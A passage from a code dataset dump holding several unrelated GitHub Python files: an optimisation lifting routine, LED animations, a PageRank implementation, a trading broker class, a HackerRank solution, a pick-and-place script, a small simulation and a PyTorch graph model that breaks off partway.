#\n # We run through all variables in the original model and we create the _0 and _1 lifted variables,\n # as well as a copy of the variable itself (which we do first first)\n\n target = {}\n \n # hack code for giving an arbitrary value to the target\n #j = 0\n #for var in model.getVars():\n # j += 1\n # target[var.Varname] = j\n\n\n target = vectordictionary\n\n for var in model.getVars():\n Dmodel.addVar(obj = 0.0, lb = var.lb, ub = var.ub, name = var.varname)\n for DisjunctionCase in range(2):\n for var in model.getVars():\n newname = var.varname + '_' + str(DisjunctionCase)\n #if newname[0] == 'b': print(newname)\n if var.varname == liftingvariablename:\n print(newname)\n thisub = var.ub\n thislb = var.lb\n\n if varSet[var.varname] == liftingvariable.varname and DisjunctionCase == 0:\n thislb = thisub = 0\n Dmodel.addVar(obj = 0.0, lb = thislb, ub = thisub, name = newname)\n\n # This needs to be fixed. In the 0 case, the x and y variables that belong to the set for the lifting variable\n # should be set to zero\n\n # there is some waste in this, in particular in terms of the lifting variable, but it's OK for now\n\n #\n Dmodel.update()\n \n constrs = model.getConstrs()\n Qconstrs = model.getQConstrs()\n \n for DisjunctionCase in range(2):\n Dliftingvariable = Dmodel.getVarByName(liftingvariable.Varname+'_'+str(DisjunctionCase))\n\n # First, linear constraints.\n \n for constr in constrs:\n expr = LinExpr() #the new constraint\n \n lhs = model.getRow(constr)\n exprSize = lhs.size()\n for k in range(exprSize): \n actualVar = lhs.getVar(k)\n #print(actualVar.Varname)\n liftedvar = Dmodel.getVarByName(actualVar.Varname+'_'+str(DisjunctionCase))\n \n coefficient = lhs.getCoeff(k)\n\n if actualVar.Varname == liftingvariable.Varname and DisjunctionCase == 0:\n coefficient = 0\n \n expr += coefficient*liftedvar\n\n rhsval = constr.RHS\n expr -= rhsval*Dliftingvariable\n\n #print(constr.ConstrName)\n #print(expr)\n if constr.Sense == '=': \n Dmodel.addConstr(expr == 0, name = constr.ConstrName + '_' + str(DisjunctionCase))\n elif constr.Sense == '>': \n Dmodel.addConstr(expr >= 0, name = constr.ConstrName + '_' + str(DisjunctionCase))\n elif constr.Sense == '<': \n Dmodel.addConstr(expr <= 0, name = constr.ConstrName + '_' + str(DisjunctionCase))\n \n # Next, quadratic constraints. The code only handles the case of pure quadratics.\n\n for Qconstr in Qconstrs: \n Qlhs = model.getQCRow(Qconstr) # The lhs is in QuadExpr() format. \n QExprSize = Qlhs.size() # This counts the number of quadratic terms.\n Dqexpr = QuadExpr()\n for k in range(QExprSize): \n actualVar1 = Qlhs.getVar1(k)\n actualVar2 = Qlhs.getVar2(k)\n Qcoeff = Qlhs.getCoeff(k)\n \n var1InQExpr = Dmodel.getVarByName(actualVar1.varname + '_' + str(DisjunctionCase))\n var2InQExpr = Dmodel.getVarByName(actualVar2.varname + '_' + str(DisjunctionCase))\n Dqexpr += Qcoeff*var1InQExpr*var2InQExpr\n\n\n Qrhsval = Qconstr.QCRHS\n if Qconstr.QCSense == '=': \n Dmodel.addQConstr(Dqexpr == Qrhsval, name = Qconstr.QCName + '_' + str(DisjunctionCase))\n elif Qconstr.QCSense == '>': \n Dmodel.addQConstr(Dqexpr >= Qrhsval, name = Qconstr.QCName + '_' + str(DisjunctionCase))\n elif Qconstr.QCSense == '<': \n Dmodel.addQConstr(Dqexpr <= Qrhsval, name = Qconstr.QCName + '_' + str(DisjunctionCase))\n\n \n Dmodel.update()\n\n # Now add constraints that effect the disjunction, i.e., for every variable v we write v = v_0 + v_1.\n\n for var in model.getVars():\n var1 = Dmodel.getVarByName(var.Varname+'_1')\n var0 = Dmodel.getVarByName(var.Varname+'_0')\n varvar = Dmodel.getVarByName(var.Varname)\n if var.Varname != liftingvariable.Varname:\n Dmodel.addConstr(varvar == var0 + var1, name = 'Dis_'+var.Varname)\n else:\n Dmodel.addConstr(varvar == var1, name = 'Lambda1')\n Dmodel.addConstr(var1 + var0 == 1, name = 'SumLambda')\n\n\n # Now let's add objective.\n distance2 = QuadExpr()\n for var in model.getVars():\n varvar = Dmodel.getVarByName(var.Varname)\n distance2 += (varvar - target[var.varname])**2\n\n\n Dmodel.setObjective(distance2, GRB.MINIMIZE)\n \n Dmodel.write('D.lp')\n\n\n breakexit('lalifted')\n","repo_name":"derdano/lpanalyze","sub_path":"lalift.py","file_name":"lalift.py","file_ext":"py","file_size_in_byte":8255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27543142376","text":"# https://www.youtube.com/watch?v=PXMJ6FS7llk\n\nfrom BaseMethods import BaseMethods\n\n\ndef print_options():\n print(\"1. Get simpson html data with pandas\")\n print(\"2. Get football csv data with pandas\")\n print(\"3. Get tables from pdf with camelot\")\n print(\"4. Web automation and web scraping: html tags - XPath\")\n print(\"5. Web automation and web scraping: headless mode\")\n print(\"6. Pivot tables with pandas\")\n print(\"7. Excel Add a bar chart\")\n print(\"8. Automate Whatsapp\")\n print(\"\")\n\n\ndef get_and_execute():\n\n options = {\n 1: BaseMethods.get_simpson_html_data_with_pandas,\n 2: BaseMethods.get_csv_data_from_website,\n 3: BaseMethods.extract_table_from_pdf,\n 4: BaseMethods.web_automation,\n 5: BaseMethods.web_automation_headless_mode,\n 6: BaseMethods.pivot_tables_excel,\n 7: BaseMethods.excel_add_bar_chart,\n 8: BaseMethods.automate_whatsapp,\n }\n option_number = int(input(\"Choose: \"))\n option = options.get(option_number)\n option()\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n print_options()\n get_and_execute()\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"MarcinEt92/Various","sub_path":"AutomateBoringStuff/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16114505220","text":"'''\nMaria plays games of college basketball in a season. Because she wants to go pro, she tracks her points scored per game sequentially in an array defined as . After each game , she checks to see if score breaks her record for most or least points scored so far during that season.\n\nGiven Maria's array of for a season of games, find and print the number of times she breaks her record for most and least points scored during the season.\n\nNote: Assume her records for most and least points at the start of the season are the number of points scored during the first game of the season.\nimport sys\n\ndef breakingRecords(score):\n # Complete this function\n\nif __name__ == \"__main__\":\n n = int(input().strip())\n score = list(map(int, input().strip().split(' ')))\n result = breakingRecords(score)\n print (\" \".join(map(str, result)))\n\nInput (stdin)\n9\n10 5 20 20 4 5 2 25 1\nYour Output (stdout)\n2 4\nExpected Output\n2 4\n\n'''\n\n#!/bin/python3\n\n\nx,n = input(), list(map(int, input().split()))\nxmax = xmin = n[0]\nxcmax = xcmin = 0\n\n# highest and lowest scores\nfor ni in n:\n if ni < xmin:\n xcmin += 1\n xmin = ni \n elif ni > xmax:\n xcmax += 1\n xmax = ni \n\nprint(xcmax, xcmin)\n\n\n","repo_name":"menquist/Michael_Enquist","sub_path":"Python/Hackerrank/Implementation - Breaking the records.py","file_name":"Implementation - Breaking the records.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"10455705639","text":"from org.openpnp.util.UiUtils import submitUiMachineTask\n\n# boiler plate to get access to psypnp modules, outside scripts/ dir\nimport os.path\nimport sys\npython_scripts_folder = os.path.join(scripting.getScriptsDirectory().toString(),\n '..', 'lib')\nsys.path.append(python_scripts_folder)\n\n# setup globals for modules\nimport psypnp.globals\npsypnp.globals.setup(machine, config, scripting, gui)\n\n############## /BOILER PLATE #################\n\n\n\n#from __future__ import absolute_import, division\n\nfrom org.openpnp.util import MovableUtils\nfrom org.openpnp.model import LengthUnit, Location\n\nimport psypnp \nimport psypnp.ui\n\n\n\n\ndef main():\n if psypnp.should_proceed_with_motion():\n submitUiMachineTask(go_cam)\n\n\n\ndef go_cam():\n \n \n if machine.defaultHead is None:\n # too weird\n return # should error\n \n defNozz = machine.defaultHead.getDefaultNozzle()\n if defNozz is None:\n return # should error\n \n \n loc = get_coords(defNozz)\n if loc is None:\n # cancel\n return\n MovableUtils.moveToLocationAtSafeZ(defNozz, loc)\n\n\ndef get_coords(nozz):\n curloc = nozz.location\n xval = psypnp.ui.getUserInputFloat(\"X\", curloc.getX())\n if xval is None:\n # cancel\n return None\n yval = psypnp.ui.getUserInputFloat(\"Y\", curloc.getY())\n if yval is None:\n # cancel\n return None\n\n location = Location(LengthUnit.Millimeters, xval, yval, curloc.getZ(), \n curloc.getRotation());\n \n return location\n\nmain()\n","repo_name":"psychogenic/psypnp","sub_path":"scripts/go/noz_absolute.py","file_name":"noz_absolute.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"44"} +{"seq_id":"18023802573","text":"\"\"\" CircuitPython sample code based on Adafruit's Simple FancyLED\n example for NeoPixel strip\n\"\"\"\n\nimport board\nimport time\nimport neopixel\nimport adafruit_fancyled.adafruit_fancyled as fancy\nimport adafruit_fancyled.fastled_helpers as helper\n\nnum_leds = 40\nhalf_leds = num_leds//2\nquarter_leds = num_leds//4\n\n# Declare a 6-element RGB rainbow palette\npalette = [\n fancy.CRGB(1.0, 0.0, 0.0), # Red\n fancy.CRGB(0.5, 0.5, 0.0), # Yellow\n fancy.CRGB(0.0, 1.0, 0.0), # Green\n fancy.CRGB(0.0, 0.5, 0.5), # Cyan\n fancy.CRGB(0.0, 0.0, 1.0), # Blue\n fancy.CRGB(0.5, 0.0, 0.5), # Magenta\n]\n\n\nheatmap_gp = bytes([\n 0, 255, 255, 255, # White\n 64, 255, 255, 0, # Yellow\n 128, 255, 0, 0, # Red\n 255, 0, 0, 0]) # Black\n# fmt: on\n\nocean_gp = bytes([\n 0, 255, 255, 255, # white\n 64, 0, 0, 255, # blue\n 128, 0, 255, 255, # cyan\n 192, 0, 255, 0, # green\n 255, 0, 0, 0]) # black\n\n# Convert the gradient palette into a normal palette w/16 elements:\nheat_palette = helper.loadDynamicGradientPalette(heatmap_gp, 16)\nocean_palette = helper.loadDynamicGradientPalette(ocean_gp, 16)\n\n\n# Declare a NeoPixel object on pin D6 with num_leds pixels, no auto-write.\n# Set brightness to max because we'll be using FancyLED's brightness control.\npixels = neopixel.NeoPixel(board.D6, num_leds, brightness=1.0, auto_write=False)\n\noffset = 0 # Positional offset into color palette to get it to 'spin'\nheat_offset = 0\n\ndef rainbow_flush(delay=.02):\n global offset\n for i in range(num_leds):\n # Load each pixel's color from the palette using an offset, run it\n # through the gamma function, pack RGB value and assign to pixel.\n color = fancy.palette_lookup(palette, offset + i / num_leds)\n color = fancy.gamma_adjust(color, brightness=0.25)\n pixels[i] = color.pack()\n pixels.show()\n time.sleep(delay)\n offset += 0.02 # Bigger number = faster spin\n\n\ndef heat_animation(delay=0.02):\n global heat_offset\n for i in range(num_leds):\n # Load each pixel's color from the palette. FastLED uses 16-step\n # in-between blending...so for a 16-color palette, there's 256\n # steps total. With 10 pixels, multiply the pixel index by 25.5\n # (and add our offset) to get FastLED-style palette position.\n color = helper.ColorFromPalette(heat_palette, int(heat_offset + i * 25.5), blend=True)\n# color = helper.ColorFromPalette(ocean_palette, int(heat_offset + i * 6.375), blend=True)\n # Apply gamma using the FastLED helper syntax\n color = helper.applyGamma_video(color)\n # 'Pack' color and assign to NeoPixel #i\n pixels[i] = color.pack()\n pixels.show()\n time.sleep(delay)\n heat_offset += 8 # Bigger number = faster spin\n\ndef simple_rainbow(delay = .03):\n global offset\n num_steps = 4\n for i in range(num_steps):\n color = fancy.palette_lookup(palette, offset + i / num_steps)\n color = fancy.gamma_adjust(color, brightness=0.25)\n col = color.pack()\n nleds = num_leds//num_steps\n start = i*nleds\n for j in range(start,start+nleds,1):\n pixels[j] = col\n\n pixels.show()\n offset += .02\n time.sleep(delay)\n\ndef opposite(n):\n if ((n//10) % 2):\n return 49 - n\n else:\n return 29 - n\n\nwalk_index = 0\ndef simple_walk(delay=0.05):\n global walk_index, offset\n\n trail_length = 4\n color = fancy.palette_lookup(palette, offset)\n oppcol = fancy.palette_lookup(palette, offset+0.5)\n for i in range(trail_length):\n index = (walk_index + i) % num_leds\n index2 = (index + 10) % num_leds\n opp_index = opposite(index)\n opp_index2 = opposite(index2)\n bright = 1.0/(trail_length - i)\n pixels[index] = fancy.gamma_adjust(color, brightness = bright).pack()\n pixels[opp_index] = pixels[index]\n pixels[index2] = fancy.gamma_adjust(oppcol, brightness = bright).pack()\n pixels[opp_index2] = pixels[index2]\n pixels.show()\n time.sleep(delay)\n pixels[walk_index] = (0,0,0)\n pixels[opposite(walk_index)] = (0,0,0)\n index2 = (walk_index + 10) % num_leds\n pixels[index2] = (0,0,0)\n pixels[opposite(index2)] = (0,0,0)\n walk_index = (walk_index + 1) % num_leds\n offset = offset + .02\n\n\n\ncurrent_animation = 0\nlast_switch_time = time.monotonic()\nanimation_run_time = 5\nanims = [heat_animation, rainbow_flush, simple_rainbow, simple_walk]\n\nwhile True:\n if (time.monotonic() - last_switch_time) > animation_run_time:\n current_animation = (current_animation + 1) % len(anims)\n pixels.fill((0,0,0))\n last_switch_time = time.monotonic()\n anims[current_animation]()","repo_name":"geekmomprojects/fiber-optic-hyperbolic-paraboloid","sub_path":"CircuitPython/parabolic_hyperboloid.py","file_name":"parabolic_hyperboloid.py","file_ext":"py","file_size_in_byte":4689,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"41627199585","text":"import matplotlib.pyplot as plt\nimport networkx as nx\n\n\ndef page_rank(g, d=0.7, pers_vector=None,\n max_iterations=100, err_tolerance=1.0e-6, starting_val=None, weight=None,\n dangling=None):\n \"\"\"\"\n !!!!!\n We used NetworkX - a Python package for the creation,\n manipulation, and study of the structure, dynamics, and functions of complex networks.\n !!!!!\n Parameters Explanation:\n !!!!!\n g(graph) :\n A NetworkX graph.\n Every Un-directed graph will be converted to a directed\n graph, with two directed edges for each un-directed edge.\n\n d(float) :\n Damping parameter for PageRank.\n Default value is 0.7.\n\n pers_vector(dictionary) :\n The pers_vector consisting of a dictionary with a\n key for every node in the graph\n and non-zero personalization value for each node.\n Default value is a uniform distribution.\n\n max_iterations(integer) :\n Maximum number of iterations in power method eigenvalue solver.\n Default value is 100.\n\n err_tolerance(float) :\n Error tolerance used to check convergence in power method solver.\n Default value is 1.0e-6.\n\n starting_val(dictionary) :\n Starting value of Page Rank iteration for each node in the graph.\n Default value is None.\n\n weight(key) :\n Edge data key to use as weight.\n If None weights are set to 1.\n\n dangling(dictionary) :\n The out edges to be assigned to any \"dangling\" nodes\n The dict key is the node the out edge points to and the dict\n value is the weight of that out edge.\n By default, dangling nodes are given\n out edges according to the pers vector (uniform if not specified).\n This must be selected to result in an irreducible transition\n matrix.\n It may be common to have the dangling dict\n to be the same as the pers vector.\n !!!!!\n Returns dictionary\n !!!!!\n Dictionary of nodes with PageRank as value.\n !!!!!\n\n \"\"\"\n if len(g) == 0:\n return {}\n if not g.is_directed():\n directed_graph = g.to_directed()\n else:\n directed_graph = g\n w = nx.stochastic_graph(directed_graph, weight=weight) # Create a copy in stochastic form\n n = w.number_of_nodes()\n if starting_val is None:\n x = dict.fromkeys(w, 1.0 / n) # Choose fixed starting vector if not given\n else:\n s = float(sum(starting_val.values())) # Normalized starting_val vector\n x = dict((k, v / s) for k, v in starting_val.items())\n if pers_vector is None:\n p = dict.fromkeys(w, 1.0 / n) # Assign uniform vector if not given\n else:\n missing = set(g) - set(pers_vector)\n if missing:\n raise nx.NetworkXError('pers dictionary must have a value for every node. Missing nodes %s' % missing)\n s = float(sum(pers_vector.values()))\n p = dict((k, v / s) for k, v in pers_vector.items())\n if dangling is None:\n dangling_weights = p # Use pers vector if dangling vector not specified\n else:\n missing = set(g) - set(dangling)\n if missing:\n raise nx.NetworkXError('Dangling node dictionary must have a value for every node. Missing nodes %s' % missing)\n s = float(sum(dangling.values()))\n dangling_weights = dict((k, v / s) for k, v in dangling.items())\n dangling_nodes = [n for n in w if w.out_degree(n, weight=weight) == 0.0]\n for _ in range(max_iterations): # power iteration: make up to max_iter iterations\n xlast = x\n x = dict.fromkeys(xlast.keys(), 0)\n danglesum = d * sum(xlast[n] for n in dangling_nodes)\n for n in x:\n for nbr in w[n]: # this matrix multiply looks odd because it is doing a left multiply x^T=xlast^T*w\n x[nbr] += d * xlast[n] * w[n][nbr][weight]\n x[n] += danglesum * dangling_weights[n] + (1.0 - d) * p[n]\n err = sum([abs(x[n] - xlast[n]) for n in x]) # check convergence\n if err < n * err_tolerance:\n return x\n raise nx.NetworkXError('page rank: power iteration failed to converge in %d iterations.' % max_iterations)\n\n\nG = nx.barabasi_albert_graph(30, 15) # 30 is the number of nodes , 15 is the number of edges to attach from a new node to existing nodes\npage_rank_values = page_rank(G, 0.7) # 0.7 is the damping parameter\nprint(\"Page Rank Results:\")\nfor pr in page_rank_values.values():\n print(pr)\n\nnx.draw(G) # This is our graph\nplt.show()\n\n\n\"\"\"\nPageRank computes a ranking of the nodes in the graph G based on\n the structure of the incoming links. It was originally designed as\n an algorithm to rank web pages.\n Return the PageRank of the nodes in the graph.\n Notes\n -----\n The eigenvector calculation is done by the power iteration method\n and has no guarantee of convergence. The iteration will stop\n after max_iter iterations or an error tolerance of\n number_of_nodes(G)*tol has been reached.\n\n The PageRank algorithm was designed for directed graphs but this\n algorithm does not check if the input graph is directed and will\n execute on undirected graphs by converting each edge in the\n directed graph to two edges.\n\n stochastic graph is a right-stochastic graph is a weighted digraph in which for each\n node, the sum of the weights of all the out-edges of that node is\n 1. If the graph is already weighted (for example, via a 'weight'\n edge attribute), the reweighting takes that into account. \"\"\"\n\n","repo_name":"daniellelagziel/PageRank","sub_path":"page_rank.py","file_name":"page_rank.py","file_ext":"py","file_size_in_byte":5475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5705300050","text":"import math\nfrom decimal import Decimal\nfrom typing import Dict\n\nfrom src.bo.inventory_bo import InventoryBO\nfrom src.constants import ZERO\n\n\nclass BrokerBO:\n\n def __init__(self, cash: Decimal, fee: Decimal, inventory: Dict[str, InventoryBO] = None) -> None:\n self._cash: Decimal = cash\n self.__fee: Decimal = fee\n self.__inventory: Dict[str, InventoryBO] = dict() if inventory is None else inventory\n\n @property\n def cash(self):\n return self._cash\n\n @property\n def inventory(self):\n return self.__inventory\n\n def update(self, ticker: str, price: Decimal) -> None:\n if not math.isnan(price):\n entry: InventoryBO = self.__inventory.get(ticker, InventoryBO(ZERO, price))\n entry.price = price\n self.__inventory[ticker] = entry\n\n def buy(self, ticker: str, price: Decimal, number: Decimal) -> bool:\n total_price: Decimal = price * number\n if self._cash >= total_price and number > 0:\n entry: InventoryBO = self.__inventory.get(ticker, InventoryBO(ZERO, price))\n entry.number += number\n entry.price = price\n self.__inventory[ticker] = entry\n self._cash = self._cash - total_price - self.__fee\n return True\n return False\n\n def sell(self, ticker: str, price: Decimal, number: Decimal) -> bool:\n total_price: Decimal = price * number\n entry: InventoryBO = self.__inventory.get(ticker, InventoryBO(ZERO, price))\n if entry.number >= number > 0:\n entry.number -= number\n entry.price = price\n self.__inventory[ticker] = entry\n self._cash = self._cash + total_price - self.__fee\n return True\n return False\n\n def funds(self) -> Decimal:\n value: Decimal = ZERO\n for ticker in self.__inventory:\n value += self.__inventory[ticker].value()\n return self._cash + value\n","repo_name":"webclinic017/trading-bot-20","sub_path":"src/bo/broker_bo.py","file_name":"broker_bo.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"32641383704","text":"import random\n\n\nclass Person:\n def __init__(self, name, house, satiety=50):\n self.Name = name\n self.Satiety = satiety\n self.House = house\n\n def eat(self):\n self.Satiety += 1\n self.House.Eat -= 1\n\n def work(self):\n self.Satiety -= 1\n self.House.Eat += 1\n\n def play(self):\n self.Satiety -= 1\n\n def go_to_the_store(self):\n self.House.Eat += 1\n self.House.Money -= 1\n\n\nclass House:\n def __init__(self, eat=50, money=0):\n self.Eat = eat\n self.Money = money\n\n\ndef action(person, act):\n if person.Satiety < 20:\n person.eat()\n elif person.House.Eat < 10:\n person.go_to_the_store()\n elif person.House.Money < 50:\n person.work()\n elif act == 1:\n person.work()\n elif act == 2:\n person.eat()\n else:\n person.play()\n\n\nhouse1 = House()\nperson1 = Person(\"Artem\", house1)\nperson2 = Person(\"No name\", house1)\n\nfor _ in range(365):\n action1 = random.randint(1, 6)\n action2 = random.randint(1, 6)\n\n action(person1, action1)\n action(person2, action2)\n\n if person1.Satiety < 0:\n print(f\"{person1.Name} died\")\n break\n else:\n print(f\"{person1.Name} - {person1.Satiety}\")\n if person2.Satiety < 0:\n print(f\"{person2.Name} died\")\n break\n else:\n print(f\"{person2.Name} - {person2.Satiety}\")\n\n# зачтено\n","repo_name":"KuranovaPolina/Skillbox_Python_homework","sub_path":"Module24/07_cohabitation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2125429310","text":"import math\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport utils\r\n\r\n\r\nclass FeatureEmbedding(nn.Module):\r\n def __init__(self, emb_f_size):\r\n super(FeatureEmbedding, self).__init__()\r\n self.emb_f = nn.Embedding(34, emb_f_size)\r\n\r\n def forward(self, f_idx):\r\n emb_out = self.emb_f(f_idx)\r\n return emb_out\r\n\r\n\r\nclass ValueTimeEmbedding(nn.Module):\r\n def __init__(self, input_v_size, emb_v_size, proj_e_size):\r\n super(ValueTimeEmbedding, self).__init__()\r\n self.input_v_size = input_v_size\r\n for i in range(input_v_size):\r\n setattr(self, \"emb_v1_\" + str(i + 1), nn.Linear(1, int(math.sqrt(emb_v_size))))\r\n setattr(self, \"emb_v2_\" + str(i + 1), nn.Linear(int(math.sqrt(emb_v_size)), emb_v_size, bias=False))\r\n setattr(self, \"emb_t1_\" + str(i + 1), nn.Linear(1, int(math.sqrt(emb_v_size))))\r\n setattr(self, \"emb_t2_\" + str(i + 1), nn.Linear(int(math.sqrt(emb_v_size)), emb_v_size, bias=False))\r\n self.emb_v1 = [getattr(self, \"emb_v1_\" + str(i + 1)) for i in range(input_v_size)]\r\n self.emb_v2 = [getattr(self, \"emb_v2_\" + str(i + 1)) for i in range(input_v_size)]\r\n self.emb_t1 = [getattr(self, \"emb_t1_\" + str(i + 1)) for i in range(input_v_size)]\r\n self.emb_t2 = [getattr(self, \"emb_t2_\" + str(i + 1)) for i in range(input_v_size)]\r\n\r\n self.Wx = nn.Linear(input_v_size*emb_v_size, proj_e_size)\r\n self.Wt = nn.Linear(input_v_size*emb_v_size, proj_e_size)\r\n self.tanh = nn.Tanh()\r\n\r\n def forward(self, x, time):\r\n out = [self.emb_v2[i](self.tanh(self.emb_v1[i](x[:, :, i].unsqueeze(2)))) for i in range(self.input_v_size)]\r\n x_out = torch.stack(out).permute(1, 2, 0, 3)\r\n out = [self.emb_t2[i](self.tanh(self.emb_t1[i](time[:, :, i].unsqueeze(2)))) for i in range(self.input_v_size)]\r\n time_out = torch.stack(out).permute(1, 2, 0, 3)\r\n\r\n x_out = x_out.reshape(x_out.shape[0], x_out.shape[1], -1)\r\n time_out = time_out.reshape(time_out.shape[0], time_out.shape[1], -1)\r\n final_out = self.Wx(x_out) + self.Wt(time_out)\r\n\r\n return final_out\r\n\r\n\r\nclass CrossModule(nn.Module):\r\n def __init__(self, emb_f_size, input_v_size, input_v_len, emb_v_size, proj_e_size):\r\n super(CrossModule, self).__init__()\r\n self.input_v_size = input_v_size\r\n self.vte = ValueTimeEmbedding(input_v_size, emb_v_size, proj_e_size)\r\n self.fe = FeatureEmbedding(emb_f_size)\r\n self.fe_att = nn.Linear(emb_f_size * 5, emb_v_size)\r\n self.vte_seq = nn.Linear(input_v_len, 1)\r\n\r\n self.conv = nn.Conv1d(proj_e_size, proj_e_size, kernel_size=2 * 1 + 1, stride=1, padding=1)\r\n self.softmax = nn.Softmax(dim=2)\r\n\r\n def forward(self, f_idx, x, time):\r\n Ex = self.vte(x, time)\r\n Ex_ = self.vte_seq(Ex.permute(0, 2, 1))\r\n Ex_fea = Ex.permute(0, 2, 1)\r\n if f_idx == None:\r\n return Ex_fea.permute(0, 2, 1)\r\n\r\n Ef = self.fe(f_idx)\r\n Ef = Ef.view(self.input_v_size, -1)\r\n Ef = Ef.unsqueeze(0).expand(x.shape[0], Ef.shape[0], Ef.shape[1])\r\n Ef_ = self.fe_att(Ef)\r\n Ef_ = Ef_.reshape(Ef_.shape[0],-1).unsqueeze(2)\r\n\r\n E = torch.bmm(Ef_, Ex_.permute(0, 2, 1)) / torch.sqrt(torch.tensor(self.input_v_size).to(utils.device))\r\n att = self.softmax(self.conv(E))\r\n out = torch.bmm(att, Ex_fea).permute(0, 2, 1)\r\n\r\n return out\r\n\r\n\r\nclass Similarity(nn.Module):\r\n def __init__(self, input_v_size, base_size, base_emb_size, phi):\r\n super(Similarity, self).__init__()\r\n self.input_v_size = input_v_size\r\n self.phi = nn.Parameter(torch.tensor(phi), requires_grad=True)\r\n self.visit = nn.Linear(input_v_size, 1)\r\n self.proj = nn.Linear(base_size, base_emb_size)\r\n self.softmax = nn.Softmax(dim=1)\r\n\r\n def forward(self, Ex, base):\r\n base = self.proj(base)\r\n visit_att = self.softmax(self.visit(Ex))\r\n Ex_ = torch.bmm(visit_att.permute(0, 2, 1), Ex).squeeze(1)\r\n Ex_all = torch.cat((Ex_, base), 1)\r\n adj_matrix = torch.mm(Ex_all, Ex_all.T) / torch.pow(torch.tensor(self.input_v_size).to(utils.device), 2)\r\n\r\n adj_matrix_out = torch.where(adj_matrix > self.phi, adj_matrix, torch.zeros(adj_matrix.shape).to(utils.device))\r\n\r\n return adj_matrix_out, Ex_all, base\r\n\r\n\r\nclass GraphConvolution(nn.Module):\r\n def __init__(self, in_features, out_features, task, bias=True):\r\n super(GraphConvolution, self).__init__()\r\n self.in_features = in_features\r\n self.out_features = out_features\r\n self.task = task\r\n self.weight = nn.Parameter(torch.FloatTensor(in_features, out_features))\r\n if bias:\r\n self.bias = nn.Parameter(torch.FloatTensor(out_features))\r\n else:\r\n self.register_parameter('bias', None)\r\n self.reset_parameters()\r\n\r\n def reset_parameters(self):\r\n stdv = 1. / math.sqrt(self.weight.size(1))\r\n self.weight.data.uniform_(-stdv, stdv)\r\n if self.bias is not None:\r\n self.bias.data.uniform_(-stdv, stdv)\r\n\r\n def forward(self, input, adj):\r\n if self.task == 'Imputation':\r\n support = torch.matmul(input, self.weight)\r\n output = torch.matmul(support.permute(1, 2, 0), adj.T).permute(2, 0, 1)\r\n if self.task == 'Prediction':\r\n support = torch.mm(input, self.weight)\r\n output = torch.spmm(adj, support)\r\n if self.bias is not None:\r\n return output + self.bias\r\n else:\r\n return output\r\n\r\n\r\nclass GCN(nn.Module):\r\n def __init__(self, input_size, hid1_size, hid2_size, task):\r\n super(GCN, self).__init__()\r\n self.gc1 = GraphConvolution(input_size, hid1_size, task)\r\n self.gc2 = GraphConvolution(hid1_size, hid2_size, task)\r\n\r\n def forward(self, x, adj):\r\n x = F.relu(self.gc1(x, adj))\r\n # x = F.dropout(x, self.dropout, training=self.training)\r\n x = self.gc2(x, adj)\r\n return F.log_softmax(x, dim=1)\r\n\r\n\r\nclass InfoAgg(nn.Module):\r\n def __init__(self, input_size, hid_size):\r\n super(InfoAgg, self).__init__()\r\n self.proj = nn.Linear(hid_size, input_size)\r\n self.proj1 = nn.Linear(input_size, 1)\r\n self.proj2 = nn.Linear(input_size, 1)\r\n self.sigmoid = nn.Sigmoid()\r\n\r\n def forward(self, x_self, x_other):\r\n x_other = self.proj(x_other)\r\n gamma = self.sigmoid(self.proj1(x_self))\r\n eta = self.sigmoid(self.proj2(x_other))\r\n gamma = gamma / (gamma + eta)\r\n eta = 1 - gamma\r\n x_final = gamma * x_self + eta * x_other\r\n\r\n return x_final\r\n\r\n\r\nclass Model(nn.Module):\r\n def __init__(self, emb_f_size, input_v_size, emb_v_size, proj1_e_size, proj2_e_size, base_size, base_emb_size, hid1_size, hid2_size, phi, drop_p, task):\r\n super(Model, self).__init__()\r\n self.input_v_size = input_v_size\r\n self.base_emb_size = base_emb_size\r\n self.task = task\r\n input_v_len = 211\r\n self.Emb = CrossModule(emb_f_size, input_v_size, input_v_len, emb_v_size, proj1_e_size)\r\n if self.task == 'Imputation':\r\n self.Emb_last = CrossModule(emb_f_size, input_v_size, input_v_len, emb_v_size, proj2_e_size)\r\n self.Emb_next = CrossModule(emb_f_size, input_v_size, input_v_len, emb_v_size, proj2_e_size)\r\n self.Sim = Similarity(proj1_e_size, base_size, base_emb_size, phi)\r\n self.Gcn = GCN(proj1_e_size + base_emb_size, hid1_size, hid2_size, task)\r\n self.Agg = InfoAgg(proj1_e_size + base_emb_size, hid2_size)\r\n self.W1 = nn.Linear(proj1_e_size + base_emb_size, input_v_size)\r\n self.W2 = nn.Linear(proj2_e_size * 2, input_v_size)\r\n self.Wy = nn.Linear(proj1_e_size + base_emb_size, 2)\r\n self.softmax = nn.Softmax(dim=1)\r\n self.dropout = nn.Dropout(p=drop_p)\r\n\r\n def forward(self, f_idx, x, time, xbase, mask):\r\n time = time.unsqueeze(2).expand(time.shape[0], time.shape[1], self.input_v_size)\r\n\r\n if self.task == 'Imputation':\r\n time = time * mask\r\n\r\n time_last_list = []\r\n time_next_list = []\r\n x_last_list = []\r\n x_next_list = []\r\n for i in range(x.shape[0]):\r\n time_last, time_next = utils.data_process(time[i])\r\n time_last_list.append(time_last)\r\n time_next_list.append(time_next)\r\n x_last, x_next = utils.data_process(x[i])\r\n x_last_list.append(x_last)\r\n x_next_list.append(x_next)\r\n\r\n 